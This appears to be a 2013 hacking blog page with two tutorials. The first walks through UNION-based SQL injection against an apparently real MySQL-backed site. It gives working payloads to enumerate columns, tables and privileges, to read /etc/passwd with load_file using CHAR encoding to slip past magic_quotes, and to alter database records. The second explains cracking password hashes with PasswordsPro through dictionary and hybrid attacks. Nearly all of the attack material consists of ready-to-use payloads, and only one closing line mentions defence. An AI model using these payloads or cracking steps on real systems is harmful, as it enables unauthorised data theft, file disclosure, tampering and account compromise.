Friday, January 11, 2013

Real World SQL Injection

Exploiting Web 2.0 , Real World SQL INJECTION




0x000 - NULL
0x001 - Introduction
0x010 - Global Exploiting
0x011 - Exploiting The Bug
0x101 - Conclusion
0x110 - Help full links


------------------------------------------------------

0x001 - Introduction :

SQL Injection is a technique allow you to exploit

a web vulnerability to extract content of the database

and show it for the injector thanks to an error while the

request ....

------------------------------------------------------

0x010 - Global Exploiting :

Exploiting The SQL Injection Vulnerability

To Exploit This Vulnerability You Got to have the following

conditions :

1- Null the query

2- Get The Number of columns

-> To null the query its enough to add something that does not

exist in the database

-> To know the number of columns in MySQL you can

use the next command in the query : '+order+by+x--

x is the number of columns you try to guess :

=> if the page shows normal with no errors this means that

the number you entered is < than real number of columns

=> if the page show and error this means that

the number you entered is > than real number of columns

now you are wondering how to know the real number of columns

i'll tell you , its the number right before 1st error !

Note : Don't forget the comment :

( -- or /* or # or a null byte )

i hope its pretty clear

so build the query like this

=> ' union select 1,2,3--

1,2,3 -> number of columns

in our example the number of columns is 19 :

'+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18--




xx - now lets get basic info about this database

=> DataBase Name

-> you can get the version of the db with 'database()'

' union select 1,2,3,4,5,6,7,database(),9,10,11,12,13,14,15,16,17 ,18,19--




The database is called "fluff2"

=> DataBase Version

-> you can get the version of the db with 'version()'

' union select 1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17, 18,19--




The database Version is "5"

=> DataBase UserName

-> you can get the version of the db with 'user()'

' union select 1,2,3,4,5,6,7,user(),9,10,11,12,13,14,15,16,17,18, 19--




The database username is "muu"

=> DataBase Location

-> you can get the version of the db with '@@datadir'

' union select 1,2,3,4,5,6,7,@@datadir,9,10,11,12,13,14,15,16,17, 18,19--




The database is located in "/var/lib/mysql/"

xxx - Get your privileges !

Let's Try any priv's (select,update,file etc...)

' union select 1,2,3,4,5,6,7,update_priv,9,10,11,12,13,14,15,16,1 7,18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,file_priv,9,10,11,12,13,14,15,16,17, 18,19 from mysql.user--

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,1 7,18,19 from mysql.user--

it seems that nothing is allowed !




well , since our user is muu lets try to see our priv's while our user = muu

' union select 1,2,3,4,5,6,7,select_priv,9,10,11,12,13,14,15,16,1 7,18,19 from mysql.user where user=CHAR(109, 117, 117)--

we can see we got full privileges now :P




0x011 - Exploiting The Bug :

let's try now to get the database content and use it !

=> uploading a file !

to upload any file magic_quotes got to be set 'OFF'

-> what the fuck is magic_quotes ?

Magic_Quotes is a feature in php Made to help coders

and developers to avoid falling in SQL injections vulnerabilities

and its going to be removed in PHP6 !

Well , in Our FaceBook Magic_Quotes Are set 'ON'

we cannot use into outfile to upload a File .!

=> Getting DB content :

to read content of a specific column , you must use the following

' union select 1,2,3,4,5,6,7,column,9,10,11,12,13,14,15,16,17,18, 19 from table--

column -> its your wanted column to read

table -> its the table where the wanted column located

Now you wonder , You don't know column names or table names ,

how to do ?

since its V5 The database it got to have information_schema inside

so let's exploit information_schema :

-> Get Tables :

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema, 0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--




Like you See It's showing the name of the table | database

but only one table appears ! what to do to show to rest ?

change concat into group_concat ; the xplt like this :

' union select 1,2,3,4,5,6,7,group_concat(table_name,0x7c,table_s chema,0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables--




well its showing some more

but this is not all

lets try something different !

add after our current exploit LIMIT 1 OFFSET 44--

' union select 1,2,3,4,5,6,7,concat(table_name,0x7c,table_schema, 0x7c),9,10,11,12,13,14,15,16,17,18,19 FROM information_schema.tables LIMIT 1 OFFSET 44--

and Change the '44' to another number and it will show another table

Now you wonder how to get table columns ?!

Alright , you can get table columns from information_schema.columns like the following

from+information_schema.columns+where+table_name=" table_name"

so in our exploit it will became like this :

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 FROM information_schema.columns where table_name='info'--

since Magic_Quotes are set to 'ON' we must convert table name to ASCII

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 FROM information_schema.columns where table_name=CHAR(105, 110, 102, 111)--




Bingo ! this is one column

to show the others use 'limit 1 offset'

You can see content of any column =)

For Now lets try to look for specific table or specific column !

you can get it using

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 from information_schema.columns where column_name like time--

Note : time is the column wanted to look for

and dont forget to change the column to ASCII because magic_quotes on

' union select 1,2,3,4,5,6,7,column_name,9,10,11,12,13,14,15,16,1 7,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--

To see other infos of the column concatenate 'column_name' with table_schema and table_name

' union select 1,2,3,4,5,6,7,concat(column_name,0x7c,table_schema ,0x7c,table_name),9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where column_name like CHAR(116, 105, 109, 101)--




update fluff2 set time=alphanix where

Bingo ! You can see column , db , table , and look for any column ,

pretty easy ? isn't

=> Reading Any File content :

since we have file loading privileges , we can load any file

in the server (must have right permissions) and show it !

' union select 1,2,3,4,5,6,7,load_file(/etc/passwd),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=muu--

and convert to ascii

' union select 1,2,3,4,5,6,7,load_file(CHAR(47, 101, 116, 99, 47, 112, 97, 115, 115, 119, 100)),9,10,11,12,13,14,15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)--




here we loaded '/etc/passwd' file , i would like to

get the shadow but i dont have root privileges

=> Updating the database :

since we got update privilege we can change value

of any field in the db !

update query is like the following :

' update table_name set column_name='new value' where column_name='value' where user=muu

never forget to convert to ascii xD

------------------------------------------------------

0x101 - Conclusion :

SQL injections are vulnerable in 60% of scripts , and its really important

to learn how to protect our selves from it to make more secure scripts


0x110 - Additional Useful Link :

http://pentestmonkey.net/blog/mysql-sql-injection-cheat-sheet/

Monday, January 7, 2013

How to use Passwords Pro

My Tutorial will show you the 3 easiest Functions to make use of Dictionary attack and Hybrid attack

Before we begin, You will need the following:

1. PasswordsPro
2. A wordlist (Multiple lists are suggested)
3. A Brain
4. Patience

To begin i will show you a Dictionary Attack

Note: The algorithm depends on your Hash.

1. Open PasswordsPro


2. Click Options
3. Click Hashing Modules, Right Click, Add
4. Browse to your PasswordsPro Folder


5. Open the Modules folder, Press CTRL+A, Deselect the 2 folders.


6. Press ok
7. Click Dictionaries, Right click, Add



8. Select your Dictionaries (Ensure you click All files) For this ill be using MoPList.dic, Click OK etc etc



9. Note: Time to Input your hashes, This can be done in multiple way, I will only be showing the MANUAL way.
Right click one of the cells, Click Add


10. Insert your hash, I will be using these hashes :

10af61c65f34b24a1c591ca77eff73c0:10blah


Note: Just to show you how i would Usually do it


11. Select your type of attack, Simple Dictionary

12. Press Start
13. The program will then work on cracking your hashes.
14. As you can see, The program has found one of my passwords.


15. Enjoy =)
Note: You have never 100% guaranteed to find a password

Hybrid Attack

Simply follow the steps above, But at Step 7 click press, Hybrid Dictionary Attack


And as you can see, I have found another password =)

Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security